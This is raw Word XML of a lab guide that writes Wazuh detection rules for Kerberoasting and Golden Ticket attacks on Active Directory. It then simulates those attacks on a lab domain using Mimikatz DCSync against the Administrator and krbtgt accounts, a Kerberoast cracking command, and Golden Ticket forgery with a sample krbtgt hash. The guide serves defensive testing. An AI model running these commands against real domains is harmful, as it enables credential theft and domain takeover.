              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>Ignore all Directory Service Access that is originated from a machine account containing $</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFF86B9"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808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E01BCF" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14979B4F" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="6A9955"/>
              </w:rPr>
              <w:t>&lt;!-- Rule for detecting Keberoasting attacks using Windows security events --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172DE7A4"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CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"110002"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>level</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"12"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571C2C0F"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if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>60103</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED31F1A"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system.eventID"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>^4769$</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="345D189D"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TicketOptions"</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0x40810000</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="728615B9"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TicketEncryptionType"</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0x17</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFC607B"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options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>no_full_log</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="190E1558"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description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>Possible Keberoasting attack</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C558F75"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808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="096D6814" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453E824F" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="6A9955"/>
              </w:rPr>
              <w:t>&lt;!-- Rule for detecting Golden Ticket attacks using Windows security events --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A19EFA3"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rule</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"110003"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>level</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"12"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200AF903"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if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>60103</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FFFB5CA"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system.eventID"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>^4624$</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FEDEE15"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LogonGuid"</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00000000-0000-0000-0000-000000000000}</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D38475"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field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"win.eventdata.logonType"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"pcre2"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E8D3479"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options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>no_full_log</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A22FA19" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>Possible Golden Ticket attack</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE15989" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00DC138E" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>rule</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6234CF68" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00DC138E" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37463FDE" w14:textId="71CB1D29" w:rsidR="00077375" w:rsidRPr="00F56741" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC138E">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="728DD470" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6 — Simulate Attacks and Verify Wazuh Alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BCD0A" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. DCSync Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395D851" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Run Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698738B" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:r w:rsidRPr="00CB78F7">
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B96A23" w14:textId="77777777" w:rsidR="0013184B" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>lsadump::dcsync /domain:WinServ.local /user:Administrator</w:t>
      </w:r>
      <w:r w:rsidR="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83C902" w14:textId="77777777" w:rsidR="0013184B" w:rsidRDefault="0013184B" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53DBCD" w14:textId="6C7CE5AB" w:rsidR="0013184B" w:rsidRPr="00CB78F7" w:rsidRDefault="0013184B" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>lsadump::dcsync /domain:WinServ.local /user:krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307E928C" w14:textId="4FDEAB37" w:rsidR="00C47210" w:rsidRPr="00A30D4B" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Verify Wazuh alert id 110001 appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C04D9E" w14:textId="777D895A" w:rsidR="00A30D4B" w:rsidRDefault="00A30D4B" w:rsidP="00C47210">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61808B21" wp14:editId="099C84B3">
            <wp:extent cx="6689580" cy="2217420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10558688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4386" cy="2222328"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCA766" w14:textId="77777777" w:rsidR="00A30D4B" w:rsidRPr="0013184B" w:rsidRDefault="00A30D4B" w:rsidP="00C47210">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF57169" w14:textId="314258BF" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Kerberoasting Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0CCD77" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Run Python Kerberoast script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1233460B" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>python tgsrepcrack.py -d WinServ.local -u TargetUser -p passwords.txt -t TicketOutputFolder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560C4C9" w14:textId="78130AE3" w:rsidR="00A30D4B" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Verify alert id 110002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C74E9" w14:textId="77777777" w:rsidR="00A30D4B" w:rsidRPr="00CB78F7" w:rsidRDefault="00A30D4B" w:rsidP="00A30D4B"/>
    <w:p w14:paraId="720AA124" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Golden Ticket Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD4CEF4" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRPr="00CB78F7" w:rsidRDefault="00CB78F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB78F7">
        <w:t>Use Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B141745" w14:textId="77777777" w:rsidR="00CB78F7" w:rsidRDefault="00CB78F7" w:rsidP="00CB78F7">
      <w:r w:rsidRPr="00CB78F7">
        <w:t>kerberos::ptt /ticket:GoldenTicket.krb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED48E2D" w14:textId="77777777" w:rsidR="0013184B" w:rsidRPr="0013184B" w:rsidRDefault="0013184B" w:rsidP="0013184B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>kerberos::golden /user:Administrator /domain:WinServ.local /sid:S-1-5-21-3079670428-507354839-1974674015 /krbtgt:fb850d37e711e8b045c411f450a7c84b /id:500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3573D" w14:textId="0A477EBB" w:rsidR="0013184B" w:rsidRPr="0013184B" w:rsidRDefault="0013184B" w:rsidP="0013184B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F552561" w14:textId="73D58267" w:rsidR="0013184B" w:rsidRPr="0013184B" w:rsidRDefault="0013184B" w:rsidP="0013184B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/user:Administrator → account you want to forge a ticket for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55615AA0" w14:textId="60F8ABA4" w:rsidR="0013184B" w:rsidRPr="0013184B" w:rsidRDefault="0013184B" w:rsidP="0013184B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/domain:WinServ.local → your lab domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E23713" w14:textId="77330CF5" w:rsidR="0013184B" w:rsidRPr="0013184B" w:rsidRDefault="0013184B" w:rsidP="0013184B">
